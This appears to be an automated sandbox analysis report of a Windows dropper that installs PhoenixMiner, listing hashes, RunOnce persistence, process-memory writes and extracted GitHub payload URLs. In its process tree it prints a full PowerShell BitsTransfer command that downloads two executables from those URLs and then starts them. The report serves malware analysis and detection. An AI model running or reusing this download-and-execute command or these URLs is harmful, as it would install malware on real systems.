Analysis
-
max time kernel
51s -
max time network
153s -
platform
windows10_x64 -
resource
win10-20220414-en -
resource tags
arch:x64arch:x86image:win10-20220414-enlocale:en-usos:windows10-1703-x64system -
submitted
01-08-2022 02:28
Static task
static1
Behavioral task
behavioral1
Sample
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
Resource
win10-20220414-en
General
-
Target
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
-
Size
8.3MB
-
MD5
9ed9ad87a1564fbb5e1b652b3e7148c8
-
SHA1
0c001b7e9615cbc22eac2a324d8deb7eaf069ff7
-
SHA256
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89
-
SHA512
e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a
Malware Config
Extracted
https://raw.githubusercontent.com/jkh36/d/main/bild.exe
https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe
Signatures
-
Executes dropped EXE 1 IoCs
Processes:
PhoenixMiner.exepid process 1184 PhoenixMiner.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
PhoenixMiner.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce PhoenixMiner.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" PhoenixMiner.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4352 powershell.exe 4352 powershell.exe 4352 powershell.exe 3280 powershell.exe 3280 powershell.exe 3280 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4352 powershell.exe Token: SeDebugPrivilege 3280 powershell.exe -
Suspicious use of WriteProcessMemory 9 IoCs
Processes:
3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exePhoenixMiner.exedescription pid process target process PID 808 wrote to memory of 1184 808 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 808 wrote to memory of 1184 808 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 808 wrote to memory of 1184 808 3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe PhoenixMiner.exe PID 1184 wrote to memory of 4352 1184 PhoenixMiner.exe powershell.exe PID 1184 wrote to memory of 4352 1184 PhoenixMiner.exe powershell.exe PID 1184 wrote to memory of 4352 1184 PhoenixMiner.exe powershell.exe PID 1184 wrote to memory of 3280 1184 PhoenixMiner.exe powershell.exe PID 1184 wrote to memory of 3280 1184 PhoenixMiner.exe powershell.exe PID 1184 wrote to memory of 3280 1184 PhoenixMiner.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1184 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4352 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Start-Process lWr.exe; Start-Process ck.exe;3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3280
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56ed4b3d25a6f22e8dcef5167080ceb75
SHA1b953ecc8de151b85f0b64784235a924b609582ca
SHA256d4e932b7151d03a034cc4c0567082d2390fc791dc95b2a4d9a0623acbf4d2384
SHA51280ef5c4be3611238fb1f15561fd1ae8101482e8b94897be141a0d9728851bc6edf3c497a619acef7ff481a5e45b24df5584b32979d9006cc2c1e61fd2aed9d9b
-
Filesize
19KB
MD56236fd33161d3adc15818a2139ba0136
SHA1bc1b5b7c115a2f8eee9cb564c1287bc66ad820c3
SHA2565f725b68c7b28636ac2916362ac6f5d06e8615d77a2d7e99d47646911e7469c1
SHA5121a778471208462bfa0457e72b9511729196d669302965b6ecf78eec0b1e6aa5ac404db4a4de8350f3c1ecf1cdc5ac2244746de636449b46572cc517501a001d6
-
Filesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17
-
Filesize
8.2MB
MD5c74ab76362f2321b7143e8ba2517c16b
SHA16b4c65e2b1ba59d155c5d453285fae4d3e52b2a6
SHA256938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f
SHA5122a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17